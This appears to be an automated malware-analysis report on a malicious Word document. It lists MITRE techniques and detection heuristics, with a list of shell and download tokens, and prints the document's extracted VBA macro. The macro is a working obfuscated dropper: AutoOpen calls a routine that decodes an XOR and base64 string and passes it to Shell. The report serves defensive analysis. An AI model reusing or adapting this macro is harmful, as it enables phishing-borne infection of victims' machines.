MALICIOUS
Risk Score: 210
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing a VBA macro. The macro is designed to execute a second-stage payload, as indicated by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics. The obfuscated VBA code suggests an attempt to download and run further malicious content.
Heuristics (7)
- Malformed OLE auto-open stager with embedded ZIP payload [critical] OLE_RAW_MALFORMED_AUTOOPEN_STAGER: Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code.
- Potential Shell call in VBA [critical] OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script: Shell (VpqyKylakEF)
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script: Sub AutoOpen()
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28559 bytes |

SHA-256: 4f5c2d74be65e5b15c78a63c8f664de4521f37c181fbae7311e42ea471bd9301

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Private qtWOhEHFVp As Boolean
Private DqWWeSgPLtlk(0 To 63) As Byte
Private TBUrQeGUJyHdoy((0 + (0 Xor 0)) To (100 Xor 27)) As Byte
Sub RcyLVMihhvHQSF()
Dim VpqyKylakEF As String
Dim scculoxjrZHG As String
VpqyKylakEF = xbJWSBoZdFIxrg(Array((30 + 135), 117, ((0 Xor 0) + 70), ((41 Xor 5) + 129), (28 Xor 43), ((31 Xor 47) + 94), (7 + (54 Xor 11)), 226, ((111 Xor 207) + 57), (190 Xor 72), 101, (179 + 39), ((3 Xor 64) + 154), (31 Xor 133), (142 Xor 65), (108 + 49), 234, ((27 Xor 91) + 34), (7 + 11), (131 Xor 114), (60 Xor 95), ((3 Xor 7) + 175), (3 Xor 61), (172 + 4), (185 + 55), (35 + (128 Xor 19)), ((0 Xor 80) + (4 Xor 159)), (18 + 111), (42 Xor 127), ((6 Xor 47) + 69), 173, 187, (128 Xor 80), (184 + 19), ((9 Xor 169) + 58), (73 + (54 Xor 102)), (63 + 75), 115, ((0 Xor 0) + 7), _
(58 Xor 106), (89 + (16 Xor 6)), 19, 21, ((35 Xor 231) + 59), ((0 Xor 3) + (10 Xor 42)), 230, (130 + (4 Xor 46)), 84, ((26 Xor 81) + (122 Xor 206)), (54 Xor 13), 38, (35 Xor 114), (5 Xor 8), 44, ((4 Xor 45) + (34 Xor 27)), (98 Xor 1), (4 Xor 16), (34 Xor 191), (25 Xor 2), (171 Xor 69), (1 Xor 193), (36 + 2), (85 Xor 227), 198, ((45 Xor 19) + (62 Xor 101)), 252, (209 + (29 Xor 0)), ((27 Xor 65) + (13 Xor 92)), ((4 Xor 1) + 139), (37 + (39 Xor 177)), (15 Xor 32), ((0 Xor 16) + 203), (91 + (71 Xor 35)), (30 Xor 42), (114 Xor 231), 181, (9 Xor 83), _
((0 Xor 2) + 41), 48, 201, (107 + (64 Xor 16)), (69 Xor 21), (72 + (10 Xor 74))), ((0 Xor 0) + 0)) & xbJWSBoZdFIxrg(Array(((20 Xor 61) + 95), ((23 Xor 13) + (4 Xor 13)), (1 Xor 9), (52 + 47), (10 + (79 Xor 35)), (106 + 108), (142 Xor 56), (62 + (2 Xor 0)), (67 Xor 157), 173, (1 Xor 15), ((2 Xor 1) + 49), 1, (100 + 81), (19 Xor 97), 207, (40 Xor 5), 27, 8, 94, 147, (19 + 123), 198, (67 + 14), ((106 Xor 251) + (31 Xor 59)), (74 + (73 Xor 2)), ((33 Xor 4) + (72 Xor 35)), ((7 Xor 52) + (6 Xor 64)), (155 + (24 Xor 50)), (42 Xor 179), ((4 Xor 0) + (3 Xor 23))), _
((39 Xor 104) + 4))
Shell (VpqyKylakEF)
End Sub
Sub AutoOpen()
RcyLVMihhvHQSF
End Sub
Public Function gDhilYVZfd(ByVal seeDJMdshqsu As String) As Byte()
If Not qtWOhEHFVp Then mUvipGOzyLeegq
Dim ZPkTYwMRiJ() As Byte: ZPkTYwMRiJ = iMhoSwiPpAz(seeDJMdshqsu)
Dim HxDShcRIMmse As Long: HxDShcRIMmse = UBound(ZPkTYwMRiJ) + (0 + 1)
If HxDShcRIMmse Mod (3 + 1) <> (0 + (0 Xor 0)) Then Err.Raise vbObjectError, , ""
Do While HxDShcRIMmse > ((0 Xor 0) + 0)
If ZPkTYwMRiJ(HxDShcRIMmse - ((0 Xor 0) + 1)) <> Asc("=") Then Exit Do
HxDShcRIMmse = HxDShcRIMmse - ((1 Xor 0) + 0)
Loop
Dim IXeGkuufzlXlX As Long: IXeGkuufzlXlX = (HxDShcRIMmse * (0 + (3 Xor 0))) \ ((0 Xor 2) + (0 Xor 2))
Dim uSeACqFJNZ() As Byte
ReDim uSeACqFJNZ(((0 Xor 0) + 0) To IXeGkuufzlXlX - (0 Xor 1)) As Byte
Dim CZIAlZIyFcIbt As Long
Dim RuoyzDYBksOD As Long
Do While CZIAlZIyFcIbt < HxDShcRIMmse
Dim FubDntsHzex As Byte: FubDntsHzex = ZPkTYwMRiJ(CZIAlZIyFcIbt): CZIAlZIyFcIbt = CZIAlZIyFcIbt + 1
Dim fLwCTzrWAChXvG As Byte: fLwCTzrWAChXvG = ZPkTYwMRiJ(CZIAlZIyFcIbt): CZIAlZIyFcIbt = CZIAlZIyFcIbt + (0 Xor 1)
Dim XbXlSPnqVMHJW As Byte: If CZIAlZIyFcIbt < HxDShcRIMmse Then XbXlSPnqVMHJW = ZPkTYwMRiJ(CZIAlZIyFcIbt): CZIAlZIyFcIbt = CZIAlZIyFcIbt + (1 + (0 Xor 0)) Else XbXlSPnqVMHJW = Asc("A")
Dim FPVpOMdlGPS As Byte: If CZIAlZIyFcIbt < HxDShcRIMmse Then FPVpOMdlGPS = ZPkTYwMRiJ(CZIAlZIyFcIbt): CZIAlZIyFcIbt = CZIAlZIyFcIbt + ((0 Xor 1) + (0 Xor 0)) Else FPVpOMdlGPS = Asc("A")
If FubDntsHzex > (43 + (34 Xor 118)) Or fLwCTzrWAChXvG > (32 Xor 95) Or XbXlSPnqVMHJW > (59 Xor 68) Or FPVpOMdlGPS > (91 + 36) Then _
Err.Raise vbObjectError, , ""
Dim HEkJMWzctvfK As Byte: HEkJMWzctvfK = TBUrQeGUJyHdoy(FubDntsHzex)
Dim YPqjtIIBYdmGRw As Byte: YPqjtIIBYdmGRw = TBUrQeGUJyHdoy(fLwCTzrWAChXvG)
Dim DrNlikgqMTPa As Byte: DrNlikgqMTPa = TBUrQeGUJyHdoy(XbXlSPnqVMHJW)
Dim wULueEKYjlq As Byte: wULueEKYjlq = TBUrQeGUJyHdoy(FPVpOMdlGPS)
If HEkJMWzctvfK > (4 Xor 59) Or YPqjtIIBYdmGRw > 63 Or DrNlikgqMTPa > ((6 Xor 30) + (32 Xor 7)) Or wULueEKYjlq > (50 + (11 Xor 6)) Then _
Err.Raise vbObjectError, , ""
Dim JRQchnANcOIC As Byte: JRQchnANcOIC = (HEkJMWzctvfK * 4) Or (YPqjtIIBYdmGRw \ &H10)
Dim kVZFHxrgsmkI As Byte: kVZFHxrgsmkI = ((YPqjtIIBYdmGRw And &HF) * &H10) Or (DrNlikgqMTPa \ (0 + 4))
Dim OzGOndUIbCxr As Byte: OzGOndUIbCxr = ((DrNlikgqMTPa And ((1 Xor 3) + 1)) * &H40) Or wULueEKYjlq
uSeACqFJNZ(RuoyzDYBksOD) = JRQchnANcOIC: RuoyzDYBksOD = RuoyzDYBksOD + (0 + 1)
If RuoyzDYBksOD < IXeGkuufzlXlX Then uSeACqFJNZ(RuoyzDYBksOD) = kVZFHxrgsmkI: RuoyzDYBksOD = RuoyzDYBksOD + 1
If RuoyzDYBksOD < IXeGkuufzlXlX Then uSeACqFJNZ(RuoyzDYBksOD) = OzGOndUIbCxr: RuoyzDYBksOD = RuoyzDYBksOD + 1
Loop
gDhilYVZfd = uSeACqFJNZ
End Function
Private Sub mUvipGOzyLeegq()
Dim YFHxKEheVXo As Integer, HLWJDHzPjZfWYW As Integer
HLWJDHzPjZfWYW = ((0 Xor 0) + (0 Xor 0))
For YFHxKEheVXo = Asc("A") To Asc("Z"): DqWWeSgPLtlk(HLWJDHzPjZfWYW) = YFHxKEheVXo: HLWJDHzPjZfWYW = HLWJDHzPjZfWYW + (1 Xor 0): Next
For YFHxKEheVXo = Asc("a") To Asc("z"): DqWWeSgPLtlk(HLWJDHzPjZfWYW) = YFHxKEheVXo: HLWJDHzPjZfWYW = HLWJDHzPjZfWYW + 1: Next
For YFHxKEheVXo = Asc("0") To Asc("9"): DqWWeSgPLtlk(HLWJDHzPjZfWYW) = YFHxKEheVXo: HLWJDHzPjZfWYW = HLWJDHzPjZfWYW + (1 + (0 Xor 0)): Next
DqWWeSgPLtlk(HLWJDHzPjZfWYW) = Asc("+"): HLWJDHzPjZfWYW = HLWJDHzPjZfWYW + (1 + (0 Xor 0))
DqWWeSgPLtlk(HLWJDHzPjZfWYW) = Asc("/"): HLWJDHzPjZfWYW = HLWJDHzPjZfWYW + (0 Xor 1)
For HLWJDHzPjZfWYW = (0 + (0 Xor 0)) To (11 Xor 116): TBUrQeGUJyHdoy(HLWJDHzPjZfWYW) = 255: Next
For HLWJDHzPjZfWYW = (0 + 0) To ((15 Xor 30) + 46): TBUrQeGUJyHdoy(DqWWeSgPLtlk(HLWJDHzPjZfWYW)) = HLWJDHzPjZfWYW: Next
qtWOhEHFVp = True
End Sub
Private Function iMhoSwiPpAz(ByVal seeDJMdshqsu As String) As Byte()
Dim YPqjtIIBYdmGRw() As Byte: YPqjtIIBYdmGRw = seeDJMdshqsu
Dim wfmavbMxEIj As Long: wfmavbMxEIj = (UBound(YPqjtIIBYdmGRw) + ((0 Xor 0) + 1)) \ (0 + 2)
If wfmavbMxEIj = (0 + 0) Then iMhoSwiPpAz = YPqjtIIBYdmGRw: Exit Function
Dim DrNlikgqMTPa() As Byte
ReDim DrNlikgqMTPa(0 To wfmavbMxEIj - 1) As Byte
Dim zJSRGLkMzOdmL As Long
For zJSRGLkMzOdmL = 0 To wfmavbMxEIj - ((1 Xor 0) + (0 Xor 0))
Dim YFHxKEheVXo As Long: YFHxKEheVXo = YPqjtIIBYdmGRw(((0 Xor 0) + 2) * zJSRGLkMzOdmL) + (251 + (0 Xor 5)) * CLng(YPqjtIIBYdmGRw((1 Xor 3) * zJSRGLkMzOdmL + ((0 Xor 1) + 0)))
If YFHxKEheVXo >= (82 Xor 338) Then YFHxKEheVXo = Asc("?")
DrNlikgqMTPa(zJSRGLkMzOdmL) = YFHxKEheVXo
Next
iMhoSwiPpAz = DrNlikgqMTPa
End Function
Private Function xbJWSBoZdFIxrg(ZuVPRZQvfMajQ As Variant, NgXWjIsUXH As Integer)
Dim gPbkfJLadbo As String
Dim SZHeWyfOxry() As Byte
SZHeWyfOxry = gDhilYVZfd(ActiveDocument.Variables("zImKDUInUVemuvor"))
gPbkfJLadbo = ""
For HLWJDHzPjZfWYW = LBound(ZuVPRZQvfMajQ) To UBound(ZuVPRZQvfMajQ)
gPbkfJLadbo = gPbkfJLadbo & Chr(SZHeWyfOxry(HLWJDHzPjZfWYW + NgXWjIsUXH) Xor ZuVPRZQvfMajQ(HLWJDHzPjZfWYW))
Next
xbJWSBoZdFIxrg = gPbkfJLadbo
End Function
' Processing file: /tmp/qstore_7gxr3xjc
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1028 bytes
' Macros/VBA/NewMacros - 18114 bytes
…